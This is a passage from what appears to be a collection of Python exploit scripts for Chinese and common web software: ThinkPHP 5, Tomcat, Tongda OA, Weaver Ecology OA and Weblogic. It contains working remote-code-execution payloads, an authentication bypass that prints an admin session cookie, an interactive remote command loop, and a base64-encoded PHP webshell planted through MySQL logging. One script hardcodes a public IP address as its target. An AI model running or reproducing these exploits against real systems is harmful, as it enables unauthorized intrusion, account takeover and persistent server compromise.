13 | #req = Requests()
14 | payload = r'_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "{}"'.format(random_num)
15 | try:
16 | headers = {'Content-Type': 'application/x-www-form-urlencoded'}
17 | r = requests.post(url + '/index.php?s=captcha', data=payload, headers=headers, verify=False)
18 | if random_num in r.text:
19 | print('[+]thinkphp_5_0_23_rce | ' + url)
20 | return 1
21 | else:
22 | print('[-]target is not vulnerable')
23 | return
24 | except Exception as e:
25 | print("异常对象的内容是%s"%e)
26 |
27 |
--------------------------------------------------------------------------------
/POC/Thinkphp_5_rce_1.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | #from lib.Requests import Requests
3 | import requests
4 |
5 | print("用法:http://example.com/{index.php}不需要index.php")
6 | def check(**kwargs):
7 | url = kwargs['url']
8 | #req = Requests()
9 | payload = r"/index.php/?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
10 | try:
11 | r = requests.get(url + payload, verify=False)
12 | if ('PHP Version' in r.text) or ('PHP Extension Build' in r.text):
13 | print('thinkphp5_rce_1 | ' + url)
14 | return 1
15 | else:
16 | print('target is not vulnerable')
17 | return
18 | except Exception as e:
19 | print("异常对象的内容是%s"%e)
20 |
--------------------------------------------------------------------------------
/POC/Tomcat_http_put.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import random
3 |
4 |
5 | def put(url):
6 | url = url.strip('/')
7 | text = random.randint(100000000, 200000000)
8 | payload = '/{}.txt'.format(text)
9 | url = url + payload
10 | data = {'{}'.format(text): '{}'.format(text)}
11 | header = {"user-agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"}
12 | r = requests.put(url, data=data, allow_redirects=False, verify=False, headers=header)
13 | if r.status_code == 201:
14 | print('[+]HTTP METHOD PUT url: {}'.format(url))
15 | else:
16 | print('[-]target is not vulnerable')
17 |
18 | print('[*]Usage: [URL]')
19 | def check(url):
20 | put(url)
21 |
--------------------------------------------------------------------------------
/POC/Tongda_cookie_11_4.py:
--------------------------------------------------------------------------------
1 | '''
2 | @Author : Sp4ce
3 | @Date : 2020-03-17 23:42:16
4 | @LastEditors : Sp4ce
5 | @LastEditTime : 2020-04-22 16:24:52
6 | @Description : Challenge Everything.
7 | '''
8 | import requests
9 | from random import choice
10 | import json
11 |
12 | USER_AGENTS = [
13 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
14 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
15 | "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
16 | "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
17 | ]
18 |
19 | headers={}
20 |
21 | def getV11Session(url):
22 | checkUrl = url+'/general/login_code.php'
23 | #print(checkUrl)
24 | try:
25 | headers["User-Agent"] = choice(USER_AGENTS)
26 | getSessUrl = url+'/logincheck_code.php'
27 | res = requests.post(
28 | getSessUrl, data={ 'UID': int(1)},headers=headers, verify=False)
29 | resText = json.loads(res.text)
30 | status = resText['status']
31 | #print(type(status))
32 | if str(status) == str(1):
33 |
34 | print('[+]V11 version Get Available Cookie:'+res.headers['Set-Cookie'])
35 | print('[+]访问{}/general'.format(url))
36 | return 1
37 | else:
38 | if resText['msg']:
39 | print('服务器返回:{}'.format(resText['msg']))
40 | return
41 | except Exception as e:
42 | print("异常对象的内容是%s"%e)
43 | return
44 |
45 |
46 | def get2017Session(url):
47 | checkUrl = url+'/ispirit/login_code.php'
48 | try:
49 | headers["User-Agent"] = choice(USER_AGENTS)
50 | res = requests.get(checkUrl,headers=headers, verify=False)
51 | resText = json.loads(res.text)
52 | codeUid = resText['codeuid'] #获取返回的codeUid
53 | codeScanUrl = url+'/general/login_code_scan.php'
54 | res = requests.post(codeScanUrl, data={'codeuid': codeUid, 'uid': int(
55 | 1), 'source': 'pc', 'type': 'confirm', 'username': 'admin'},headers=headers, verify=False)
56 | resText = json.loads(res.text)
57 | status = resText['status']
58 | if str(status) == str(1):
59 | getCodeUidUrl = url+'/ispirit/login_code_check.php?codeuid='+codeUid #携带codeUid访问
60 | res = requests.get(getCodeUidUrl, verify=False)
61 | print('[+]Get Available Cookie:'+res.headers['Set-Cookie']) #返回的cookie是在set-cookie
62 | return 1
63 | else:
64 | print('[-]Something Wrong With '+url + ' Maybe Not Vulnerable')
65 | return
66 | except Exception as e:
67 | print("异常对象的内容是%s"%e)
68 |
69 | print('[*]Usage: [URL]')
70 | def check(**kwargs):
71 | url = kwargs['url']
72 | result = getV11Session(url)
73 | if result:
74 | return result
75 | else:
76 | return get2017Session(url)
--------------------------------------------------------------------------------
/POC/Tongda_rce_11_4.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # -*- encoding: utf-8 -*-
3 | '''
4 | @File : tongda_rce.py
5 | @Time : 2020/03/18 11:59:48
6 | @Author : fuhei
7 | @Version : 1.0
8 | @Blog : http://www.lovei.org
9 | '''
10 |
11 | import requests
12 | import re
13 | import sys
14 |
15 | print('[*]Usage: [URL]')
16 | def check(**kwargs):
17 | url = kwargs['url']
18 |
19 | try:
20 | url1 = url + '/ispirit/im/upload.php'
21 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=---------------------------27723940316706158781839860668"}
22 | data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nexec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n"
23 | result = requests.post(url1, headers=headers, data=data, verify=False)
24 |
25 | name = "".join(re.findall("2003_(.+?)\|",result.text))
26 | url2 = url + '/ispirit/interface/gateway.php'
27 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}
28 | data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "echo fffhhh"}
29 | result = requests.post(url2, headers=headers, data=data, verify=False)
30 | if result.status_code == 200 and 'fffhhh' in result.text:
31 | # print("[+] Remote code execution vulnerability exists at the target address")
32 | print("[+]Server is vulnerable")
33 | return name
34 | else:
35 | print("[-]Server is not vulnerable")
36 | return
37 | except Exception as e:
38 | print("异常对象的内容是%s"%e)
39 |
40 | def command(url, name,command="whoami"):
41 | url = url + '/ispirit/interface/gateway.php'
42 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}
43 | data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "%s" % command}
44 | result = requests.post(url, headers=headers, data=data, verify=False)
45 | while(1):
46 | command = input("fuhei@shell$ ")
47 | if command == 'exit' or command == 'quit':
48 | break
49 | else:
50 | data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "%s" % command}
51 | result = requests.post(url, headers=headers, data=data, verify=False)
52 | print(result.text)
53 |
54 |
55 | if __name__ == '__main__':
56 | url = sys.argv[1]
57 | name = check(url)
58 | if name:
59 | print("[+] Remote code execution vulnerability exists at the target address")
60 | command(url,name)
61 | else:
62 | print("[-] There is no remote code execution vulnerability in the target address")
63 |
64 |
65 |
--------------------------------------------------------------------------------
/POC/Tongda_v11_4_rce_getshell.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/env python3
2 | # -*- coding: utf-8 -*-
3 |
4 | '''
5 | @ 已测试通过版本: v11.4
6 | @ https://www.github.com/zrools/tools/python
7 | @ 修改 oa_addr 后: python3 tongda_v11.4_rce_exp.py
8 | '''
9 |
10 | import requests, base64, re
11 |
12 | session = requests.Session()
13 |
14 | oa_addr = 'http://192.168.0.3:8080'
15 |
16 | headers = {
17 | 'Accept-Encoding' : 'gzip, deflate',
18 | 'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36'
19 | }
20 |
21 |
22 | def login():
23 | login_url = '{}/logincheck_code.php'.format(oa_addr)
24 | login_code_url = '{}/general/login_code.php?codeuid=1'.format(oa_addr)
25 |
26 | login_headers = headers
27 | login_headers['X-Requested-With'] = 'XMLHttpRequest'
28 | login_headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
29 |
30 | res = session.get(login_code_url)
31 | code_uid = res.text.strip()[-40:-2]
32 |
33 | login_data = 'UID=1&CODEUID={}'.format(code_uid)
34 |
35 | res = session.post(login_url, data=login_data, headers=login_headers)
36 |
37 | if '"status":1' in res.text:
38 | return True
39 |
40 | return False
41 |
42 |
43 | def upload_file(web_path):
44 | upload_url = '{}/general/system/database/sql.php'.format(oa_addr)
45 |
46 | upload_data = base64.b64decode( 'LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0yMDc0OTk3Njg4MjE0NjY5MjYzOTIwNTI0OTEzNjINCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic3FsX2ZpbGUiOyBmaWxlbmFtZT0iZXhwLnNxbCINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC1zcWwNCg0Kc2V0IGdsb2JhbCBnZW5lcmFsX2xvZz0nb24nOwpzZXQgZ2xvYmFsIGdlbmVyYWxfbG9nX2ZpbGU9J01ZT0FfV0VCU0hFTEwnOwpzZWxlY3QgIjw/cGhwICRjb21tYW5kPSRfR0VUWydjbWQnXTskd3NoID0gbmV3IENPTSgnV1NjcmlwdC5zaGVsbCcpOyRleGVjID0gJHdzaC0+ZXhlYygnY21kIC9jICcuJGNvbW1hbmQpOyAkc3Rkb3V0ID0gJGV4ZWMtPlN0ZE91dCgpOyAkc3Ryb3V0cHV0ID0gJHN0ZG91dC0+UmVhZEFsbCgpO2VjaG8gJHN0cm91dHB1dDs/PiI7CnNldCBnbG9iYWwgZ2VuZXJhbF9sb2c9J29mZic7Cg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0yMDc0OTk3Njg4MjE0NjY5MjYzOTIwNTI0OTEzNjItLQ==')
47 |
48 | #upload_data = base64.b64decode('LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0yMDc0OTk3Njg4MjE0NjY5MjYzOTIwNTI0OTEzNjIKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJzcWxfZmlsZSI7IGZpbGVuYW1lPSJleHAuc3FsIgpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtc3FsCgpzZXQgZ2xvYmFsIGdlbmVyYWxfbG9nPSdvbic7CnNldCBnbG9iYWwgZ2VuZXJhbF9sb2dfZmlsZT0nTVlPQV9XRUJTSEVMTCc7CnNlbGVjdCAiPD9waHBAZXJyb3JfcmVwb3J0aW5nKDApO3Nlc3Npb25fc3RhcnQoKTtpZiAoJF9TRVJWRVJbJ1JFUVVFU1RfTUVUSE9EJ10gPT09ICdQT1NUJyl7ICAgICRrZXk9ImU0NWUzMjlmZWI1ZDkyNWIiOyRfU0VTU0lPTlsnayddPSRrZXk7JHBvc3Q9ZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0Iik7aWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSl7JHQ9ImJhc2U2NF8iLiJkZWNvZGUiOyRwb3N0PSR0KCRwb3N0LiIiKTtmb3IoJGk9MDskaTxzdHJsZW4oJHBvc3QpOyRpKyspIHsgICAgICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAgICAgfX1lbHNleyRwb3N0PW9wZW5zc2xfZGVjcnlwdCgkcG9zdCwgIkFFUzEyOCIsICRrZXkpO30gICAgJGFycj1leHBsb2RlKCd8JywkcG9zdCk7ICAgICRmdW5jPSRhcnJbMF07ICAgICRwYXJhbXM9JGFyclsxXTtjbGFzcyBDe3B1YmxpYyBmdW5jdGlvbiBfX2ludm9rZSgkcCkge2V2YWwoJHAuIiIpO319ICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpO30/PiI7CnNldCBnbG9iYWwgZ2VuZXJhbF9sb2c9J29mZic7CgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTIwNzQ5OTc2ODgyMTQ2NjkyNjM5MjA1MjQ5MTM2Mi0t')
49 |
50 | shell_path = '{}\\\\api\\\\test.php'.format(web_path)
51 | upload_data = upload_data.decode('utf8').replace('MYOA_WEBSHELL', shell_path).encode('utf8')
52 |
53 | upload_headers = headers
54 | upload_headers['Content-Type'] = 'multipart/form-data; boundary=---------------------------207499768821466926392052491362'
55 |
56 | res = session.post(upload_url, data=upload_data, headers=upload_headers)
57 |
58 | webshell = ''
59 |
60 | if '数据库脚本导入完成' in res.text:
61 | webshell = '{}/api/test.php?cmd=ipconfig'.format(oa_addr)
62 |
63 | return webshell
64 |
65 |
66 | def get_path():
67 | url = '{}/general/system/security/service.php'.format(oa_addr)
68 |
69 | res = session.get(url, headers=headers)
70 |
71 | web_path = ''
72 | # 避免正则报错
73 | for i in res.text.split("\n"):
74 | if 'WEBROOT' in i:
75 | web_path = i.split('"')[-4]
76 |
77 | return web_path.replace('\\', '\\\\')
78 |
79 |
80 | def check(**kwargs):
81 |
82 | try:
83 |
84 | global oa_addr
85 | oa_addr = kwargs['url']
86 | if not login():
87 | print('login failed.')
88 | return None
89 |
90 | web_path = get_path()
91 | print('webroot: ', web_path)
92 |
93 | cookies = ';'.join([k + '=' + v for k, v in session.cookies.items()])
94 | print('cookies: ', cookies)
95 |
96 | if web_path:
97 | webshell = upload_file(web_path)
98 | if webshell:
99 | print('webshell: (GET) {}'.format(webshell))
100 | return True
101 |
102 | print('getshell failed.')
103 | return None
104 | except Exception as e:
105 | print('%s 目标不存在漏洞'%oa_addr)
106 |
107 |
108 | if __name__ == '__main__':
109 | check(**{'url':'http://220.166.20.253:8008'})
--------------------------------------------------------------------------------
/POC/URL_getTitle.py:
--------------------------------------------------------------------------------
1 | from requests.packages import urllib3
2 | from util.ExpRequest import ExpRequest,Output
3 | urllib3.disable_warnings()
4 |
5 | def check(**kwargs):
6 | try:
7 | output = Output('url_getTitle')
8 | exprequest = ExpRequest('url_getTitle', output)
9 | exprequest.get(kwargs['url'], retry_time=1)
10 | #print(exprequest.title)
11 | return exprequest.title
12 | except Exception as e:
13 | print('请求 %s 出现异常 %s'%(kwargs['url'], e))
14 | return type(e)
15 |
16 | if __name__ == "__main__":
17 | pass
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/POC/Weaver-Ecology-OA_RCE-EXP.py:
--------------------------------------------------------------------------------
1 | #/usr/bin/python
2 | #coding:utf-8
3 | #Author:Ja0k
4 | #For Weaver-Ecology-OA_RCE
5 |
6 | import urllib3
7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
8 |
9 | import requests,sys
10 |
11 | headers = {
12 | 'Content-Type': 'text/xml; charset=utf-8',
13 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
14 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0',
15 | 'Cache-Control': 'max-age=0',
16 | 'Content-Type': 'application/x-www-form-urlencoded',
17 | 'Upgrade-Insecure-Requests': '1',
18 | 'Content-Length': '578'
19 | }
20 |
21 | proxies= {'http':'http://127.0.0.1:8080'}
22 |
23 | print('[*]Usage: [URL]')
24 | def check(**kwargs):
25 | url = kwargs['url']
26 |
27 | Url_Payload1="/bsh.servlet.BshServlet"
28 | Url_Payload2="/weaver/bsh.servlet.BshServlet"
29 | Url_Payload3="/weaveroa/bsh.servlet.BshServlet"
30 | Url_Payload4="/oa/bsh.servlet.BshServlet"
31 |
32 | Data_Payload1="""bsh.script=exec("whoami");&bsh.servlet.output=raw"""
33 | Data_Payload2= """bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw"""
34 | Data_Payload3= """bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami"""
35 | for Url_Payload in (Url_Payload1,Url_Payload2,Url_Payload3,Url_Payload4):
36 | url= url + Url_Payload
37 | for Data_payload in (Data_Payload1,Data_Payload2,Data_Payload3):
38 | try:
39 | http_response = requests.post(url,data=Data_payload,headers=headers,verify=False)
40 | #print http_response.status_code
41 | if http_response.status_code == 200:
42 | if ";" not in (http_response.content):
43 | if "Login.jsp" not in (http_response.content):
44 | if "Error" not in (http_response.content):
45 | print("{0} is a E-cologyOA_RCE Vulnerability").format(url)
46 | print("Server Current Username:{0}").format(http_response.content)
47 | return 1
48 | elif http_response.status_code == 500:
49 | print("{0}500 maybe is Weaver-EcologyOA,Please confirm by yourself ").format(url)
50 | return
51 | else:
52 | pass
53 | except Exception as e:
54 | print('出现错误: %s'%type(e))
55 | #print("异常对象的内容是%s"%e)
56 |
57 | print('target is not vulliabit')
58 | if __name__ == '__main__':
59 | for line in open(sys.argv[1]).readlines():
60 | url=line.strip()
61 | #check(url)
--------------------------------------------------------------------------------
/POC/WeblogicScan.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # _*_ coding:utf-8 _*_
3 |
4 | '''
5 | ____ _ _ _ _ __ __ _
6 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
7 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
8 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
9 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
10 |
11 | '''
12 | import sys
13 | import Weblogic.Console
14 | import Weblogic.CVE_2014_4210
15 | import Weblogic.CVE_2016_0638
16 | import Weblogic.CVE_2016_3510
17 | import Weblogic.CVE_2017_3248
18 | import Weblogic.CVE_2017_3506
19 | import Weblogic.CVE_2017_10271
20 | import Weblogic.CVE_2018_2628
21 | import Weblogic.CVE_2018_2893
22 | import Weblogic.CVE_2018_2894
23 | import Weblogic.CVE_2019_2725
24 | import Weblogic.CVE_2019_2729
25 |
26 | version = "1.3"
27 | banner='''
28 | __ __ _ _ _ ____
29 | \ \ / /__| |__ | | ___ __ _(_) ___ / ___| ___ __ _ _ __
30 | \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \
31 | \ V V / __/ |_) | | (_) | (_| | | (__ ___) | (_| (_| | | | |
32 | \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_|
33 | |___/
34 | By Tide_RabbitMask | V {}
35 | '''.format(version)
36 |
37 | def PocS(rip,rport):
38 | print('[*]Console path is testing...')
39 | try:
40 | Weblogic.Console.run(rip, rport)
41 | except:
42 | print ("[-]Target Weblogic console address not found.")
43 |
44 | print('[*]CVE_2014_4210 is testing...')
45 | try:
46 | Weblogic.CVE_2014_4210.run(rip, rport)
47 | except:
48 | print ("[-]CVE_2014_4210 not detected.")
49 |
50 | print('[*]CVE_2016_0638 is testing...')
51 | try:
52 | Weblogic.CVE_2016_0638.run(rip, rport, 0)
53 | except:
54 | print ("[-]CVE_2016_0638 not detected.")
55 |
56 | print('[*]CVE_2016_3510 is testing...')
57 | try:
58 | Weblogic.CVE_2016_3510.run(rip, rport, 0)
59 | except:
60 | print ("[-]CVE_2016_3510 not detected.")
61 |
62 | print('[*]CVE_2017_3248 is testing...')
63 | try:
64 | Weblogic.CVE_2017_3248.run(rip, rport, 0)
65 | except:
66 | print ("[-]CVE_2017_3248 not detected.")
67 |
68 | print('[*]CVE_2017_3506 is testing...')
69 | try:
70 | Weblogic.CVE_2017_3506.run(rip, rport, 0)
71 | except:
72 | print ("[-]CVE_2017_3506 not detected.")
73 |
74 | print('[*]CVE_2017_10271 is testing...')
75 | try:
76 | Weblogic.CVE_2017_10271.run(rip, rport, 0)
77 | except:
78 | print("[-]CVE_2017_10271 not detected.")
79 |
80 | #print('[*]CVE_2018_2628 is testing...')
81 |
82 | print('[*]CVE_2018_2628 need you check in yourself')
83 |
84 |
85 | #print('[*]CVE_2018_2893 is testing...')
86 |
87 | print('[*]CVE_2018_2893 need you check in yourself')
88 |
89 | print('[*]CVE_2018_2894 is testing...')
90 | try:
91 | Weblogic.CVE_2018_2894.run(rip, rport, 0)
92 | except:
93 | print("[-]CVE_2018_2894 not detected.")
94 |
95 | print('[*]CVE_2019_2725 is testing...')
96 | try:
97 | Weblogic.CVE_2019_2725.run(rip, rport, 0)
98 | except:
99 | print("[-]CVE_2019_2725 not detected.")
100 |
101 | print('[*]CVE_2019_2729 is testing...')
102 | try:
103 | Weblogic.CVE_2019_2729.run(rip, rport, 0)
104 | except:
105 | print("[-]CVE_2019_2729 not detected.")
106 |
107 | print ("[*]Happy End,the goal is {}:{}".format(rip,rport))
108 |
109 | print('[*]Usage: [IP] [PORT=7001]')
110 | def check(**kwargs):
111 | url = kwargs['url']
112 | port = int('8002')
113 | PocS(url,port)
114 |
115 | if __name__ == '__main__':
116 | print(banner)
117 | print('Welcome To WeblogicScan !!!\nWhoami:rabbitmask.github.io')
118 | if len(sys.argv)<3:
119 | print('Usage: python3 WeblogicScan [IP] [PORT]')
120 | else:
121 | url = sys.argv[1]
122 | port = int(sys.argv[2])
123 | check(url,port)
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
--------------------------------------------------------------------------------
/POC/Weblogic_GIOP.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import socket,ssl
3 | import struct
4 | from urllib.parse import urlparse
5 |
6 | # Send headers
7 | IIOP_headers = bytes.fromhex('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')
8 |
9 | def handleURL(url):
10 | getipport = urlparse(url)
11 | hostname = getipport.hostname
12 | port = getipport.port
13 | if port == None and r"https://" in url:
14 | port = 443
15 | elif port == None and r"http://" in url:
16 | port = 80
17 | if r"https://" in url:
18 | url = "https://"+hostname+":"+str(port)
19 | if r"http://" in url:
20 | url = "http://"+hostname+":"+str(port)
21 | if r"https" in url:
22 | sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
23 | else:
24 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
25 | return hostname,port,sock
26 |
27 | def check(**kwargs):
28 | if 'http' in kwargs['url']:
29 | hostname,port,sock = handleURL(kwargs['url'])
30 | server_address = (hostname, port)
31 | elif ':' in kwargs['url']:
32 | server_address = (kwargs['url'].split(":")[0],int(kwargs['url'].split(":")[1]))
33 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
34 | else:
35 | print('输入错误, 请输入 URL链接 或者 IP:PORT !')
36 | return
37 | print('[+] Connecting to %s port %s' % server_address)
38 | sock.settimeout(5)
39 | try:
40 | sock.connect(server_address)
41 | print('sending:\n%s' % IIOP_headers.decode("utf-8", "ignore"))
42 | sock.sendall(IIOP_headers)
43 | data = sock.recv(20)
44 | print('received:\n%s' % data.decode("utf-8", "ignore"))
45 | sock.sendall(IIOP_headers)
46 | if b'GIOP' in data:
47 | print('%s 目标启用GIOP协议!'%server_address[0])
48 | return 1
49 | else:
50 | print('%s 目标已禁用GIOP协议!'%server_address[0])
51 | return 0
52 | except Exception as e:
53 | print(e)
54 | finally:
55 | sock.close()
56 | return 0
57 |
58 |
59 | #payloadObj = open(sys.argv[3],'rb').read()
60 |
61 | #payload = '\x00\x00\x05\xf5\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x45\x0b\xfc\xbc\xe1\xa6\x4c\x6e\x64\x7e\xc1\x80\xa4\x05\x7c\x87\x3f\x63\x5c\x2d\x49\x1f\x20\x49\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00'
62 | #payload=payload.encode()+payloadObj
63 |
64 | # adjust header for appropriate message length
65 | #payload=struct.pack('>I',len(payload)) + payload[4:]
66 |
67 | #print('[+] Sending payload...')
68 | #sock.send(payload)
69 | #data = sock.recv(1024)
70 | #print('received "%s"' % data)
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
--------------------------------------------------------------------------------
/POC/Weblogic_T3.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import socket,ssl
3 | import struct
4 | import binascii
5 | from urllib.parse import urlparse
6 |
7 | # Send headers
8 | T3_headers = 't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://localhost:7001\nLP:DOMAIN\n\n'
9 | #十六进制发送
10 | T3_hex = binascii.unhexlify("74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a50553a74333a2f2f75732d6c2d627265656e733a373030310a0a00000583016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e6")
11 |
12 | def handleURL(url):
13 | getipport = urlparse(url)
14 | hostname = getipport.hostname
15 | port = getipport.port
16 | if port == None and r"https://" in url:
17 | port = 443
18 | elif port == None and r"http://" in url:
19 | port = 80
20 | if r"https://" in url:
21 | url = "https://"+hostname+":"+str(port)
22 | if r"http://" in url:
23 | url = "http://"+hostname+":"+str(port)
24 | if r"https" in url:
25 | sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
26 | else:
27 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
28 | return hostname,port,sock
29 |
30 | def check(**kwargs):
31 | if 'http' in kwargs['url']:
32 | hostname,port,sock = handleURL(kwargs['url'])
33 | server_address = (hostname, port)
34 | elif ':' in kwargs['url']:
35 | server_address = (kwargs['url'].split(":")[0],int(kwargs['url'].split(":")[1]))
36 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
37 | else:
38 | print('输入错误, 请输入 URL链接 或者 IP:PORT !')
39 | return
40 | print('[+] Connecting to %s port %s' % server_address)
41 | sock.settimeout(5)
42 | try:
43 | sock.connect(server_address)
44 | print('sending:\n%s' % T3_headers)
45 | sock.sendall(T3_headers.encode())
46 | #print('sending:\n%s' % T3_hex.decode("utf-8", "ignore"))
47 | #sock.sendall(T3_hex)
48 | data = sock.recv(1024)
49 | print('received:\n%s' % data.decode())
50 | except Exception as e:
51 | print(e)
52 | finally:
53 | sock.close()
54 |
55 | #payloadObj = open(sys.argv[3],'rb').read()
56 |
